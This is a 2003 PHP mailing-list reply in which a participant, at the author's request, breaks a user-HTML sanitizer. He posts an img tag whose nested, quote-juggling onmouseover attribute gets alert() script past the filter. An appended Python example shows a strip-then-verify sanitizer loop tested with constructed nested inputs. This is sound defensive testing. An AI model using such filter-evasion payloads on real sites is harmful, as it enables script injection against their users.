[nycphp-talk] sanitizing user-submitted html

James Wetterau jwjr at panix.com
Fri May 30 16:49:43 EDT 2003



Chris Snyder says:
> I've whipped up a pcom-to-be that will render user-submitted HTML safe 
> from all of the cross-site-scripting attacks that I'm aware of.
> If you think you know any clever tricks for getting javascript or nasty 
> tags (like <embed>) around text filters, could you please have a go at 
> breaking it?

This submission breaks it:

Strips some attibutes:<br>
<img src='http://fotola.com/berylium/csnyder/?method=latestimage'
onmouseover='whatever(whatever="onmouseover='
alert("gotcha");
alert("I can do anything in here"); 
'/>

Note, it also breaks your page, so the exploit will not be obvious
unless you verify that the attempted "safe" HTML doesn't work by
putting it on a page by itself.  

Your program needs to verify that after it strips the HTML it hasn't
generated unsafe HTML, and it needs a way to avoid getting caught in a
loop doing that.  This is the sort of programming challenge that I
like to model with a state machine.
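The strip-then-verify loop James describes, as an added example rather than code from this thread or from Chris's pcom: the deletion rules, the verification check and the two nested inputs are constructed here to show why a single stripping pass is not enough and how a bounded fixed-point loop plus a separate output check closes the gap.

```python
import re

# Constructed, deliberately naive single-pass rules of the kind the thread
# discusses: delete on*="..." handler attributes and a few dangerous tags.
_HANDLER_ATTR = re.compile(r"""on\w+\s*=\s*(?:"[^"]*"|'[^']*')?""", re.I)
_BAD_TAG = re.compile(r"</?(?:script|embed|object|iframe)\b[^>]*>", re.I | re.S)

# Separate, stricter check applied to the OUTPUT, not the input: it must not
# share the blind spots of the stripping rules, or it cannot catch their output.
_UNSAFE = re.compile(r"<\w[^>]*\bon\w+\s*=|javascript\s*:", re.I)


def strip_once(html: str) -> str:
    """One deletion pass. On its own this can stitch a new handler together:
    '<a oonfoo=nclick="..."' loses 'onfoo=' and becomes '<a onclick="..."'."""
    html = _HANDLER_ATTR.sub("", html)
    return _BAD_TAG.sub("", html)


def looks_unsafe(html: str) -> bool:
    """Verification step run on what the stripper produced."""
    return _UNSAFE.search(html) is not None


def sanitize(html: str, max_rounds: int = 5):
    """Re-apply strip_once until the output stops changing (a fixed point),
    then verify that output. Returns the clean string, or None when the
    submission should be rejected.

    max_rounds is the guard against the loop the post warns about: deletion
    rules strictly shrink the string, so they always terminate, but a rule set
    that rewrites rather than deletes can oscillate, and a bound makes the
    'never stabilised' case an explicit rejection instead of a hang.
    """
    for _ in range(max_rounds):
        cleaned = strip_once(html)
        if cleaned == html:  # fixed point reached
            return None if looks_unsafe(cleaned) else cleaned
        html = cleaned
    return None  # did not stabilise within the bound: reject


if __name__ == "__main__":
    # Constructed samples, modelled on the shape of the submission above.
    for sample in ('<a oonfoo=nclick="alert(1)">x</a>', '<em<embed>bed src="x">'):
        print(repr(sample), "->", repr(strip_once(sample)), "->", repr(sanitize(sample)))
```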